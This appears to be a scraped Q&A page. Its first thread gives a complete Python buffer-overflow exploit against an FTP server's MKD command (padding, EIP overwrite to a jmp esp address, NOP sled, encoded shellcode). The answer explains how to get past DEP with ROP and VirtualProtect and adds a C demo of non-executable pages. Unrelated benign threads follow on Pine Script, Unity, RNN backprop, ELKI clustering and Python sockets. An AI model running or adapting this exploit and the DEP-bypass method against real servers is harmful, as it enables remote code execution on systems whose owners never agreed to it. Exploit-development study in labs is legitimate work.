Immunity debugger: access violation when executing - exploit

I am writing a simple exploit that uses jmp esp, but after jumping to ESP at address 00B7FC2C Immunity shows the error: Access violation when executing [00B7FC2C]
Here is my code:
#!/usr/bin/python2.7
import sys, os, socket
fuzz = "\x41" * 248          # padding up to the saved return address
eip = "\x59\x54\xC3\x77"     # overwrite EIP with 0x77C35459 (little-endian), the jmp esp address
nops = "\x90" * 8            # short NOP sled in front of the shellcode
shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
shellcode += "\xd0\xd4\xba\xad\xaf\xb7\xe6\xad\xce\x84\xd7\x16\x74\x80"
shellcode += "\x54\x99\xfe\xd6\x56\x52\x70\xcb\xcb\xef\x31\xfb\x4d\x98"
shellcode += "\x3f\xb5\x7f\xb4\x10\xb5\xa9\x22\xc2\x2f\x3d\x98\xd6\xc7"
shellcode += "\xca\xad\x24\x47\x60\xad\x99\x1f\x43\xbc\xe6\xdb\x03\xc0"
shellcode += "\xc1\x43\x2a\xdb\x88\xfa\xc1\x2c\x57\xa8\x73\x2f\xa8\x82"
shellcode += "\xeb\xf6\x5f\xd6\x46\x5f\x9f\xce\xcb\x33\x0c\xbc\xb8\xf0"
shellcode += "\xe1\x01\x6d\x08\xd5\xe0\xf9\xe7\x8a\x8a\xaa\x8e\xd2\xc6"
shellcode += "\x24\x35\x0e\x99\x73\x62\xd0\x8f\x11\x9d\x7f\x65\x1a\x4d"
shellcode += "\x17\x21\x49\x40\x01\x7e\x6e\x4b\x82\xd4\x6f\xa4\x4d\x32"
shellcode += "\xc6\xc3\xc7\xeb\x27\x1d\x87\x47\x83\xf7\xd7\xb8\xb8\x90"
shellcode += "\xc0\x40\x78\x19\x58\x4c\x52\x8f\x99\x62\x3c\x5a\x02\xe5"
shellcode += "\xa8\xf9\xa7\x60\xcd\x94\x67\x2a\x24\xa5\x01\x2b\x5c\x71"
shellcode += "\x9b\x56\x91\xb9\x68\x3c\x2f\x7b\xa2\xbf\x8d\x50\x2f\xb2"
shellcode += "\x6b\x91\xe4\x66\x20\x89\x88\x86\x85\x5c\x92\x02\xad\x9f"
shellcode += "\xba\xb6\x7a\x32\x12\x18\xd5\xd8\x95\xcb\x84\x49\xc7\x14"
shellcode += "\xf6\x1a\x4a\x33\xf3\x14\xc7\x3b\x2d\xc2\x17\x3c\xe6\xec"
shellcode += "\x38\x48\x5f\xef\x3a\x8b\x3b\xf0\xeb\x46\x3c\xde\x7c\x88"
shellcode += "\x0c\x3f\x1c\x05\x6f\x16\x22\x79"
command = "MKD"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.0.0.2', 21))
print "\n" + s.recv(1024)
s.send('USER anonymous\r\n')
print "\n" + s.recv(1024)
s.send('PASS \r\n')
print "\n" + s.recv(1024)
# oversized MKD argument: padding, EIP overwrite, NOP sled, shellcode
s.send(command + '' + fuzz + nops + shellcode + '\r\n')
print "\n" + s.recv(1024)
s.send('QUIT\r\n')
s.close()

As you didn't include the opcode at the address or register values, I'll point to the most likely explanation. It would appear that the process you are exploiting takes advantage of Data Execution Prevention (DEP) to prevent data on the stack executing as code. The trick to executing your shellcode under DEP is to use Return Oriented Programming (ROP) to call VirtualProtect() or a similar function to disable DEP for the memory area that holds your shellcode before returning control to your shellcode. You can find more information on bypassing DEP here: https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube
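What the answer describes, as an added example that is not part of the original thread: a small C program (Linux/POSIX, with mprotect() standing in for VirtualProtect()) copies a constructed stub of machine code into a fresh read/write page and calls it, first without and then with execute permission. Without PROT_EXEC the call faults the same way the debugger reports it, an access violation when executing at the page address; a SIGSEGV handler turns that fault into a -1 return so the program survives to show the contrast. The stub bytes (they just return 42), the page layout and the run_stub() name are this example's own assumptions, not anything taken from the post's target.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON
#endif

/* Constructed "shellcode" (assumption of this example): a stub that returns 42
 * so success is observable. Real payloads are longer; the DEP problem is the same. */
#if defined(__x86_64__) || defined(__i386__)
static const uint8_t STUB[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00,   /* mov eax, 42 */
                                0xc3 };                         /* ret         */
#elif defined(__aarch64__)
static const uint8_t STUB[] = { 0x40, 0x05, 0x80, 0x52,         /* mov w0, #42 */
                                0xc0, 0x03, 0x5f, 0xd6 };       /* ret         */
#else
static const uint8_t STUB[] = { 0 };   /* no encoding for this target */
#define STUB_UNSUPPORTED 1
#endif

static sigjmp_buf fault_env;

/* A fault while executing the page is the POSIX equivalent of Immunity's
 * "Access violation when executing [addr]"; unwind instead of dying. */
static void on_fault(int sig)
{
    (void)sig;
    siglongjmp(fault_env, 1);
}

/* Copies STUB into a new RW page and calls it.
 * make_executable != 0 performs the step a DEP-bypass ROP chain does through
 * VirtualProtect(): flip the page to read+execute before jumping into it.
 * Returns 42 if the stub ran, -1 if executing it faulted, -2 on a setup error. */
int run_stub(int make_executable)
{
#ifdef STUB_UNSUPPORTED
    (void)make_executable;
    return -2;
#else
    long pagesz = sysconf(_SC_PAGESIZE);
    uint8_t *page = mmap(NULL, (size_t)pagesz, PROT_READ | PROT_WRITE,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -2;
    memcpy(page, STUB, sizeof STUB);          /* payload lands in a data page */

    if (make_executable) {
        if (mprotect(page, (size_t)pagesz, PROT_READ | PROT_EXEC) != 0) {
            munmap(page, (size_t)pagesz);
            return -2;
        }
        /* Needed where instruction and data caches are separate (e.g. AArch64). */
        __builtin___clear_cache((char *)page, (char *)page + sizeof STUB);
    }

    struct sigaction sa, old_segv, old_bus;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fault;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);

    volatile int result;
    if (sigsetjmp(fault_env, 1) == 0) {
        int (*fn)(void) = (int (*)(void))(uintptr_t)page;
        result = fn();                        /* the "jmp esp" moment */
    } else {
        result = -1;                          /* faulted: page is not executable */
    }

    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    munmap(page, (size_t)pagesz);
    return result;
#endif
}

int main(void)
{
    printf("without PROT_EXEC: %d (the DEP-style fault)\n", run_stub(0));
    printf("with    PROT_EXEC: %d\n", run_stub(1));
    return 0;
}
```

The stack on the Windows target is just another non-executable data region under DEP, so landing on ESP faults for the same reason run_stub(0) does here. Before building a ROP chain, confirm the diagnosis in the debugger: the memory map (Alt+M in Immunity) shows the access rights of the region that contains ESP, and if that region is not executable no amount of bad-character fixing will make the payload run from it.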

Related

'range' cannot be used as a variable or function name

The error is:
Compilation error. Line 13: 'range' cannot be used as a variable or
function name.
//@version=5
indicator('My Script')
// compute the bar range (high minus low)
range = high - low
// define the contents of the info box
info = "Open: " + tostring(open) + "\n"
     + "High: " + tostring(high) + "\n"
     + "Low: " + tostring(low) + "\n"
     + "Range: " + tostring(range) + "\n"
     + "Volume: " + tostring(volume)
// highlight the bar when the mouse hovers over it
bgcolor(not nz(bgcolor[1]) and barstate.ishovered, color.new(color.red, 50))
// show the info box when the mouse hovers over the current bar
label.new(bar_index, high, text=info, xloc=xloc.bar_time, yloc=yloc.abovebar)
Your code is full of errors.
For the range problem, just change:
range = high - low
to:
myrange = high - low

Unity3D Stop counter

I made a script for a game that counts the playtime. So the question is how can I stop the script before the game is over, or for example save the time as a float.
// for the play time
SpielZeit += Time.deltaTime;
// SpielZeitText = play time as a string + "Sekunden"
SpielZeitText.text = " " + Mathf.Round(SpielZeit).ToString() + " " + "Sekunden";
// SpielZeitFuerEscape = play time as a string + "Sekunden" (for the escape canvas)
SpielZeitFuerEscape.text = " " + Mathf.Round(SpielZeit).ToString() + " " + "Sekunden";
SpielZeit, SpielZeitText, and SpielZeitFuerEscape should be put as members of the main class. Or you should make them accessible to anything which needs them.
Then put the counter in an Update function. (If you want to make a frame-by-frame update, include the .text setters there as well.) Enclose the counter with an if statement, which sees if you want to continue it, or if you want to stop it.
if (go_on) { // if the counter should keep going
    // for the play time
    SpielZeit += Time.deltaTime;
    // SpielZeitText = play time as a string + "Sekunden"
    SpielZeitText.text = " " + Mathf.Round(SpielZeit).ToString() + " " + "Sekunden";
    // SpielZeitFuerEscape = play time as a string + "Sekunden" (for the escape canvas)
    SpielZeitFuerEscape.text = " " + Mathf.Round(SpielZeit).ToString() + " " + "Sekunden";
}
where go_on is a boolean, telling the code whether it should continue (true) or stop (false).

RNN backprop-through-time

I'm investigating RNNs and after reading this paper, I got how Backprop-through-time works on RNNs:
https://arxiv.org/pdf/1610.02583.pdf
But I have some confusion with the following implementation (from cs231):
for t in reversed(xrange(T)):
    # gradient arriving at h_t: from this step's output and from step t+1
    dh_current = dh[t] + dh_prev
    dx_t, dh_prev, dWx_t, dWh_t, db_t = rnn_step_backward(dh_current, cache[t])
    dx[t] += dx_t
    dh0 = dh_prev
    # parameters are shared across time steps, so their gradients accumulate
    dWx += dWx_t
    dWh += dWh_t
    db += db_t
Why summing up dh[t] and dh_prev gradients, dh_current = dh[t] + dh_prev ?
Full source code: https://github.com/williamchan/cs231-assignment3/blob/master/cs231n/rnn_layers.py

How to see ELKI DBSCAN clustering result

I am using ELKI for DBSCAN clustering of some ~14,000 GPS points. It's running fine but I want to see information about the clusters, like how many points are in a cluster.
If you use the -resulthandler ResultWriter and output to text, the cluster sizes will be at the top of each cluster file.
The visualizer currently doesn't seem to show cluster sizes.
Also, if you want to merge all those results into a single file, here is a python script that works:
import os

clusterout_path = "path/to/where/files/all/go/"
finalout_path = "/path/for/single/merged/file/"
consol_filename = "single_merged_file.txt"

cll_file = open(finalout_path + consol_filename, "a")
cll_file.write("ClusterID" + "\t" + "Lon" + "\t" + "Lat" + "\n")

def readFile(file):
    f = open(clusterout_path + file)
    counter = 0
    cluster = ""
    lon = ""
    lat = ""
    for line in f.readlines():
        counter += 1
        if counter == 1:
            # the first line of each ELKI cluster file names the cluster
            cluster = line.split(":")[1].strip().lower()
        if counter > 4 and line.startswith("ID"):
            # data rows: object ID followed by the coordinates
            arr = line.split(" ")
            lon = arr[1]
            lat = arr[2]
            cll_file.write(cluster + "\t" + lon + "\t" + lat + "\n")
    f.close()

listing = os.listdir(clusterout_path)
for infile in listing:
    print("Processing file: " + infile)
    readFile(infile)
cll_file.close()

using bytearray with socket.recv_into

I am doing some socket IO, and using a bytearray object as a buffer. I would like to receive data with an offset into this buffer using csock.recv_into as shown below in order to avoid creating intermediary string objects. Unfortunately, it seems bytearrays can't be used this way, and the code below doesn't work.
buf = bytearray(b" " * toread)
read = 0
while (toread):
    # buf[read:] is a copy, so the received bytes never land in buf
    nbytes = csock.recv_into(buf[read:], toread)
    toread -= nbytes
    read += nbytes
So instead I am using the code below, which does use a temporary string (and works)...
buf = bytearray(b" " * toread)
read = 0
while (toread):
    tmp = csock.recv(toread)
    nbytes = len(tmp)
    buf[read:] = tmp
    toread -= nbytes
    read += nbytes
Is there a more elegant way to do this that doesn't require copying intermediate strings around?
Use a memoryview to wrap your bytearray:
buf = bytearray(toread)
view = memoryview(buf)
while toread:
    # recv_into writes straight into buf through the view, no temporary string
    nbytes = sock.recv_into(view, toread)
    if nbytes == 0:
        break              # peer closed the connection early
    view = view[nbytes:]   # slicing views is cheap
    toread -= nbytes